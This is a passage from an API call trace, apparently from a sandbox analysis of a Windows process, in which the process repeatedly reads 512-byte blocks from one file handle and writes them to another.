nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.510] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.511] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.511] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.512] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.512] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.513] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.514] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.514] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.515] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.515] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.516] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.516] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.517] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.517] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.518] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.518] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.519] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.519] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.520] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.520] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.521] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.521] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.521] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.522] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.522] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.533] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.533] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.534] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.535] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.535] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.536] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.536] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.536] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.537] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.537] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.538] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.539] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.539] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.540] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.541] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.541] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.542] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.542] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.543] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.543] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.544] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.544] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.545] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.545] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.546] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.546] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.547] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.547] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.548] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.548] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.549] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.549] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.550] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.550] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.551] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.551] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.551] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.552] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.552] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.553] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.553] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.554] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.555] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.555] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.555] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.556] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.556] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.557] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.558] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.558] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.559] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.559] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.559] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.560] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.560] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.561] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.561] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.562] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.562] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.563] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.563] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.564] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.564] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.565] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.565] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.566] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.566] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.567] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.567] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.568] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.568] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.569] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, 